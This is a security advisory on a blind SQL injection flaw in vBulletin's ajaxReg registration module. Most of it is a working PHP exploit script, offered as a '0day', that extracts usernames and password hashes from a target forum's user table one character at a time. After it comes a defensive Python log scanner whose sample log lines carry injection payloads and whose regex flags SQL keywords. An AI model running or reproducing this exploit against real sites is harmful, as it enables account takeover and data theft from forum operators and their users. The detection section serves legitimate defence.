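Published: 2012-12-08
Updated: 2012-12-12

Affected systems:
VBulletin VBulletin

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56877

vBulletin is a powerful, flexible forum software suite that can be fully customized to your needs. ajaxReg is an AJAX-based registration module that supports real-time field checking. The ajaxReg module for vBulletin has an SQL injection vulnerability in its implementation; successful exploitation allows an attacker to gain unauthorized access to the database.

<*Source: Cold z3ro
*>

Test method:
--------------------------------------------------------------------------------
Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

#!/usr/bin/php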
<?# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
# check it : http://www.example.com/vBulletin/clientscript/register.js

function usage ()
{
echo
"
[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
"
[+] Author: Cold z3ro".
"
[+] Site : http://www.example.com | www.example.com".
"
[+] vandor: http://www.example.com/forum/showthread.php?t=144869".
"
[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
"
[+] Ex. : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
"
[+] Note. : Its a 0day exploit
";
exit ();
}

function check ($hostname, $path, $field, $pos, $usid, $char)
{
$char = ord ($char);
$inj = "ajax.php?do=CheckUsername¶m=";
$inj.=
"admin"+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
$culr = $hostname.$path.$inj;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $culr );
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_VERBOSE, 0);
ob_start();
curl_exec ($curl);
curl_close ($curl);
$con = ob_get_contents();
ob_end_clean();
if(eregi("Invalid",$con))
return true;
else
return false;
}
function brutechar ($hostname, $path, $field, $usid, $key)
{
$pos = 1;
$chr = 0;
while ($chr < strlen ($key))
{
if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
}
if (count ($argv) != 4)
usage ();

$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = $argv [4];
if (empty ($key))
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key);
echo "
[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key);
echo "
[+] Done..";
echo "
[+] It"s not fake, its real.";
# word to 1337day.com, stop scaming me
?>

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

VBulletin
---------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.vbulletin.com/
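
With no vendor fix available, attempts against the ajaxReg username check can be looked for in web server access logs. The following Python code is an added example, not part of the original advisory or of vBulletin/ajaxReg; the log lines, client addresses, the `/forum/` path and the `param` parameter name in the sample are constructed, and the token list is an assumption to tune per site.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Dec/2012:10:00:01 +0000] "GET /forum/ajax.php?do=CheckUsername&param=alice HTTP/1.1" 200 20
198.51.100.9 - - [08/Dec/2012:10:00:02 +0000] "GET /forum/ajax.php?do=CheckUsername&param=admin%27+and+ascii(substring((select+1),1,1))=97/* HTTP/1.1" 200 27
198.51.100.9 - - [08/Dec/2012:10:00:02 +0000] "GET /forum/ajax.php?do=CheckUsername&param=admin%27+and+ascii(substring((select+1),1,1))=98/* HTTP/1.1" 200 20
198.51.100.9 - - [08/Dec/2012:10:00:03 +0000] "GET /forum/ajax.php?do=CheckUsername&param=admin%27+and+ascii(substring((select+1),2,1))=97/* HTTP/1.1" 200 20
203.0.113.5 - - [08/Dec/2012:10:00:04 +0000] "GET /forum/showthread.php?t=1&select=all HTTP/1.1" 200 512
203.0.113.8 - - [08/Dec/2012:10:00:05 +0000] "GET /forum/ajax.php?do=CheckUsername&param=O%27Brien HTTP/1.1" 200 20
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# SQL constructs that have no place in a username availability check (assumed list).
SQL_TOKENS = re.compile(
    r"\b(select|union|substring|ascii|sleep|benchmark)\b|/\*|--", re.IGNORECASE)


def suspicious_requests(log_text):
    """Yield (client_ip, decoded_value) for CheckUsername calls carrying SQL syntax."""
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/ajax.php"):
            continue
        params = parse_qsl(url.query, keep_blank_values=True)  # URL-decodes values
        if ("do", "CheckUsername") not in params:
            continue
        for name, value in params:
            # Inspect every parameter except the action selector itself.
            if name != "do" and SQL_TOKENS.search(value):
                yield ip, value


def summarize(log_text):
    """Map client IP -> flagged request count; a burst suggests blind extraction."""
    hits = defaultdict(int)
    for ip, _ in suspicious_requests(log_text):
        hits[ip] += 1
    return dict(hits)


if __name__ == "__main__":
    for ip, count in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {count} suspicious CheckUsername request(s)")
```

A username containing only an apostrophe (the `O'Brien` line) is not flagged; the rule keys on SQL keywords and comment markers, so many flagged requests from one client in a short span are the signal worth alerting on.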